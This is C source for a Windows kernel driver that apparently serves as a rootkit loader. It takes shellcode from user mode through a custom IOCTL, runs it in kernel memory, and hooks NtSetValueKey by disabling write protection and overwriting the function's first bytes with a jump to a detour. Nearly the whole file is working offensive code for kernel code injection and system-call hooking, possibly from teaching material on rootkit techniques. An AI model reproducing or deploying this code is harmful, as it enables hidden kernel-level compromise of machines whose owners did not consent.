/*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                             +
+	kmd.c                                                                     +
+                                                                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/

#include "ntddk.h"
#include "aux_klib.h"
#include "ctrlcode.h"
#include "datatype.h"
#include "device.h"
#include "GetNTCalls.c"
#include "modwp.c"
#include "irql.c"

#pragma pack(1)
typedef struct ServiceDescriptorEntry 
{
    DWORD *KiServiceTable;
    DWORD *CounterBaseTable;
    DWORD nSystemCalls;
    DWORD *KiArgumentTable;
 } SDE, *PSDE;
#pragma pack()

__declspec(dllimport)  SDE KeServiceDescriptorTable;
BYTE *systemCallTable;

#define SZ_INVOKE_CODE		11		
#define SZ_OLD_CODE			10		
#define SZ_DETOUR			31		

DWORD shellcodeAddress		= 0;	
DWORD detourPatchAddress	= 0;	
DWORD originalNTAddress;			
BYTE oldCode[SZ_OLD_CODE];			

typedef void (*doDNSQueriesPtr)(DWORD nQueries, DWORD netioAddress, DWORD shellcodeBaseAddress);

BYTE unHook;
BYTE memFree;

PDEVICE_OBJECT  DCOMClientDeviceObject;
PDRIVER_OBJECT  DriverObjectRef;

#define MEM_TAG							'BOB'	//the perfect name, Praise Bob!

DWORD LoadAndNoFree(DWORD nBytes, BYTE *inputBuffer, DWORD inputBufferLength)
{
	DWORD				allocatedAddress;
	BYTE*				bytePtr;
	DWORD				index;
	allocatedAddress = (DWORD)ExAllocatePoolWithTag
	(
		NonPagedPool,	
		nBytes,			
		(DWORD)MEM_TAG	
    );
	bytePtr = (BYTE*)allocatedAddress;
	if(bytePtr==NULL)
	{
		return(0);
	}
	for(index=0;index<inputBufferLength;index++)
	{
		bytePtr[index]=inputBuffer[index];
	}
	return(allocatedAddress);
}/*end LoadAndNoFree()-------------------------------------------------------*/

void getDriverBaseAddress(DWORD *moduleAddress, DWORD nameHash)
{
	NTSTATUS					ntStatus;
	ULONG						bufferSize;
	AUX_MODULE_EXTENDED_INFO*	modules;
	ULONG						nModules;
	DWORD						i;
	*moduleAddress = 0;
	ntStatus = AuxKlibInitialize();
	if(!NT_SUCCESS(ntStatus))
	{
		return;
	}
	ntStatus = AuxKlibQueryModuleInformation
	(
		&bufferSize,
		sizeof(AUX_MODULE_EXTENDED_INFO),
		NULL
	);
	if (!NT_SUCCESS(ntStatus) || bufferSize == 0)
	{
		return;
	}
	nModules = bufferSize / sizeof(AUX_MODULE_EXTENDED_INFO);
	modules = (AUX_MODULE_EXTENDED_INFO*) ExAllocatePoolWithTag
	(
		NonPagedPool,
		bufferSize,
		'BOB'
	);
	if(modules == NULL) 
	{
		ntStatus = STATUS_INSUFFICIENT_RESOURCES;
		return;
    }
	RtlZeroMemory(modules,bufferSize);
	ntStatus = AuxKlibQueryModuleInformation
	(
		&bufferSize,
		sizeof(AUX_MODULE_EXTENDED_INFO),
		modules
	);
	if (!NT_SUCCESS(ntStatus))
	{
		return;
    }
	for(i=0;i<nModules;i++)
	{
		DWORD routineAddress;
		DWORD hash = 0xFFFFFFFF;
		DWORD baseAddress;
		baseAddress = (DWORD)modules[i].BasicInfo.ImageBase;
		hash = getHashA(modules[i].FullPathName);
		if(hash==nameHash)
		{
			*moduleAddress = baseAddress;
		}
	}
	ExFreePool((PVOID)modules);
    return;
}/*end getDriverBaseAddress()------------------------------------------------*/

DWORD getAddressNtSetValueKey()
{
	DWORD routineAddress;
	DWORD ssdtIndexAddress;
	DWORD ssdtIndex;
	BYTE* systemCallTable;
	DWORD *dwordArrayPtr;
	DWORD ssdtAddress;
	routineAddress = (DWORD)ZwSetValueKey;
	ssdtIndexAddress = routineAddress+1;
	ssdtIndex = *((PULONG)ssdtIndexAddress);
	dwordArrayPtr = (DWORD*)(KeServiceDescriptorTable.KiServiceTable);
	return(dwordArrayPtr[ssdtIndex]);
}/*end getAddressNtSetValueKey()---------------------------------------------*/

void saveOriginalCode(BYTE *dst, DWORD startAddress, DWORD nBytes)
{
	BYTE *bptr;
	DWORD i;

	bptr = (BYTE*)startAddress;
	for(i=0;i<nBytes;i++)
	{
		dst[i] = bptr[i];
	}
	return;
}/*end saveOriginalCode()----------------------------------------------------*/

void buildDetour(BYTE *code,BYTE* replacedCode, DWORD shellCodeAddress, DWORD systemCallAddress)
{
	BYTE	*bptr;
	DWORD	*iptr;
	DWORD	i;
	code[0]=  0xbe;
	code[1]=  0xdd;
	code[2]=  0xcc;
	code[3]=  0xbb;
	code[4]=  0xaa;
	code[5]=  0x56;
	code[6]=  0x56;
	code[7]=  0x6a;
	code[8]=  0x01;
	code[9]=  0xff;
	code[10]= 0xd6;
	bptr = &(code[1]);
	iptr = (DWORD*)bptr;
	*iptr = shellcodeAddress;
	code[11]= replacedCode[0];
	code[12]= replacedCode[1];
	code[13]= replacedCode[2];
	code[14]= replacedCode[3];
	code[15]= replacedCode[4];
	code[16]= replacedCode[5];
	code[17]= replacedCode[6];
	code[18]= replacedCode[7];
	code[19]= replacedCode[8];
	code[20]= replacedCode[9];
	code[21]= 0x68;
	code[22]= 0xdd;
	code[23]= 0xcc;
	code[24]= 0xbb;
	code[25]= 0xaa;
	code[26]= 0xc3;
	bptr = &(code[22]);
	iptr = (DWORD*)bptr;
	*iptr = systemCallAddress+SZ_OLD_CODE;
	return;
}/*end buildDetour()---------------------------------------------------------*/

DWORD allocateDetourPatch(DWORD nBytes)
{
	DWORD	allocatedAddress;
	BYTE*	bytePtr;
	DWORD	i;
	allocatedAddress = (DWORD)ExAllocatePoolWithTag
	(
		NonPagedPool,	
		nBytes,			
		(DWORD)MEM_TAG	
    );
	bytePtr = (BYTE*)allocatedAddress;
	if(bytePtr==NULL)
	{
		return(0);
	}
	return(allocatedAddress);
}/*allocateDetourPatch()-----------------------------------------------------*/

void buildJump(BYTE *code, DWORD detourAddress)
{
	BYTE	*bptr;
	DWORD	*iptr;
	code[0]=  0x68;
	code[1]=  0xdd;
	code[2]=  0xcc;
	code[3]=  0xbb;
	code[4]=  0xaa;
	code[5]=  0xc3;
	bptr = &(code[1]);
	iptr = (DWORD*)bptr;
	*iptr = detourAddress;
	return;
}/*end buildJump()-----------------------------------------------------------*/

void InstallShellcode(BYTE *inputBuffer, DWORD inputBufferLength)
{
	DWORD				hash;
	DWORD				baseAddress;
	doDNSQueriesPtr		routinePtr;
	BYTE				detourPatch[SZ_DETOUR];
	BYTE				detourJump[SZ_OLD_CODE];
	DWORD				i;
	BYTE				*bptr;
	DWORD				*iptr;
	KIRQL				irql;
	PKDPC				dpcPtr;
	shellcodeAddress = LoadAndNoFree(10240,inputBuffer,inputBufferLength);
	if(shellcodeAddress==0)
	{
		return;
	}
	hash = 0x6036F862;	//computed via getHashA()
	getDriverBaseAddress(&baseAddress,hash);
	if(baseAddress==0)
	{
		return;
	}
	routinePtr = (doDNSQueriesPtr)shellcodeAddress;
	routinePtr(0,baseAddress,(DWORD)routinePtr);
	originalNTAddress = getAddressNtSetValueKey();
	saveOriginalCode(oldCode,originalNTAddress,SZ_OLD_CODE);
	buildDetour(detourPatch,oldCode,(DWORD)routinePtr,originalNTAddress);
	detourPatchAddress = allocateDetourPatch(SZ_DETOUR);
	if(detourPatchAddress==0)
	{
		return;
	}
	bptr = (BYTE*)detourPatchAddress;
	for(i=0;i<SZ_DETOUR;i++){ bptr[i] = detourPatch[i]; }
	detourJump[0] = 0x68;
	detourJump[5] = 0xc3;
	bptr = &(detourJump[1]);
	iptr = (DWORD*)bptr;
	*iptr = detourPatchAddress;
	disableWP_CR0();
	irql = RaiseIRQL();
	dpcPtr = AcquireLock();
	bptr = (BYTE*)originalNTAddress;
	for(i=0;i<SZ_OLD_CODE;i++){ bptr[i] = detourJump[i]; }
	ReleaseLock(dpcPtr);
	LowerIRQL(irql);
	enableWP_CR0();

	unHook	= TRUE;
	memFree = TRUE;
	return;
}/*end InstallShellcode()----------------------------------------------------*/

void Command
(
    PVOID               inputBuffer,
    PVOID               outputBuffer,
    DWORD               inputBufferLength,
    DWORD               outputBufferLength
)
{
    char *ptrBuffer;
    InstallShellcode(inputBuffer,inputBufferLength);
    ptrBuffer = (char*)outputBuffer;
    ptrBuffer[0]='!';
    ptrBuffer[1]='1';
    ptrBuffer[2]='2';
    ptrBuffer[3]='3';
    ptrBuffer[4]='!';
    ptrBuffer[5]='\0';
    return;
}/*end Command()-------------------------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   Dispatch Routines                                                         |
|                                                                             |             
-----------------------------------------------------------------------------*/

NTSTATUS defaultDispatch
(
    IN PDEVICE_OBJECT   pDeviceObject,  //pointer to Device Object structure
    IN PIRP             pIRP            //pointer to I/O Request Packet structure
)
{
    ((*pIRP).IoStatus).Status = STATUS_SUCCESS;
    ((*pIRP).IoStatus).Information = 0;
    IoCompleteRequest(pIRP,IO_NO_INCREMENT);
    return(STATUS_SUCCESS);
}/*end defaultDispatch()-----------------------------------------------------*/

NTSTATUS dispatchIOControl
(
    IN PDEVICE_OBJECT   pDeviceObject, 
    IN PIRP             pIRP            
)
{ 
    PIO_STACK_LOCATION  irpStack;   
    PVOID               inputBuffer;
    PVOID               outputBuffer;
    ULONG               inputBufferLength;
    ULONG               outputBufferLength;
    ULONG               ioctrlcode;
    NTSTATUS            ntStatus;
    ntStatus = STATUS_SUCCESS;
    ((*pIRP).IoStatus).Status = STATUS_SUCCESS;
    ((*pIRP).IoStatus).Information =0;
    inputBuffer     = (*pIRP).AssociatedIrp.SystemBuffer;
    outputBuffer    = (*pIRP).AssociatedIrp.SystemBuffer;
    irpStack            = IoGetCurrentIrpStackLocation(pIRP);
    inputBufferLength   = (*irpStack).Parameters.DeviceIoControl.InputBufferLength;
    outputBufferLength  = (*irpStack).Parameters.DeviceIoControl.OutputBufferLength;
    ioctrlcode          = (*irpStack).Parameters.DeviceIoControl.IoControlCode;
    switch(ioctrlcode)
    {
        case IOCTL_RK_CMD:
        {
            Command(inputBuffer, outputBuffer, inputBufferLength, outputBufferLength);   
            ((*pIRP).IoStatus).Information = outputBufferLength;
        }break;
    }
    IoCompleteRequest(pIRP,IO_NO_INCREMENT);
    return(ntStatus); 
}/*end dispatchIOControl()---------------------------------------------------*/

NTSTATUS RegisterDriverDeviceName
(
    IN PDRIVER_OBJECT pDriverObject
)
{
    NTSTATUS ntStatus;
    UNICODE_STRING unicodeString;  
    RtlInitUnicodeString(&unicodeString,DeviceNameBuffer);
	ntStatus = IoCreateDevice
	(
		pDriverObject,				//pointer to driver object
		0,							//# bytes allocated for device extension of device object
		&unicodeString,				//unicode string containing device name
		FILE_DEVICE_RK,				//driver type (vendor defined)
		0,							//one or more system-defined constants, OR-ed together
		TRUE,						//the device object is an exclusive device
		&DCOMClientDeviceObject		//pointer to global device object
	);     
    return(ntStatus);
}/*end RegisterDriverDeviceName()--------------------------------------------*/

NTSTATUS RegisterDriverDeviceLink()
{
    NTSTATUS ntStatus;
    UNICODE_STRING unicodeString;
    UNICODE_STRING unicodeLinkString;
    RtlInitUnicodeString(&unicodeString,DeviceNameBuffer);
    RtlInitUnicodeString(&unicodeLinkString,DeviceLinkBuffer);
	ntStatus = IoCreateSymbolicLink
	(
		&unicodeLinkString,
		&unicodeString
	);     
    return(ntStatus);
}/*end RegisterDriverDeviceLink()--------------------------------------------*/

VOID Unload(IN PDRIVER_OBJECT pDriverObject)
{
    PDEVICE_OBJECT	pdeviceObj;
    UNICODE_STRING  unicodeString;
	KIRQL irql;
	PKDPC dpcPtr;
	BYTE *bptr;
	DWORD i;
	pdeviceObj = (*pDriverObject).DeviceObject;
	if (pdeviceObj!= NULL)
	{
        RtlInitUnicodeString( &unicodeString, DeviceLinkBuffer);
		IoDeleteSymbolicLink( &unicodeString );
		IoDeleteDevice( (*pDriverObject).DeviceObject);
	} 
	if(unHook==TRUE)
	{
		disableWP_CR0();
		irql = RaiseIRQL();
		dpcPtr = AcquireLock();
		bptr = (BYTE*)originalNTAddress;
		for(i=0;i<SZ_OLD_CODE;i++){ bptr[i] = oldCode[i]; }
		ReleaseLock(dpcPtr);
		LowerIRQL(irql);
		enableWP_CR0();
	}
	if(memFree==TRUE)
	{
		if(shellcodeAddress!=0)
		{
			ExFreePoolWithTag
			(
				(PVOID)shellcodeAddress,	
				(DWORD)MEM_TAG				 
			);
		}
		if(detourPatchAddress!=0)
		{
			ExFreePoolWithTag
			(
				(PVOID)detourPatchAddress,	
				(DWORD)MEM_TAG				
			);
		}
	}
	return;
}/*end Unload()--------------------------------------------------------------*/

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING regPath)
{
    int i;
    NTSTATUS ntStatus;
    for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
    {
        (*pDriverObject).MajorFunction[i] = defaultDispatch;
    }
    (*pDriverObject).MajorFunction[IRP_MJ_DEVICE_CONTROL]   = dispatchIOControl;
    (*pDriverObject).DriverUnload = Unload;
    ntStatus = RegisterDriverDeviceName(pDriverObject);
    if(!NT_SUCCESS(ntStatus))
	{
        return ntStatus;
    }
    ntStatus = RegisterDriverDeviceLink();
    if(!NT_SUCCESS(ntStatus))
	{
        return ntStatus;
    }
	DriverObjectRef = pDriverObject;
    return(STATUS_SUCCESS);
}/*end DriverEntry()---------------------------------------------------------*/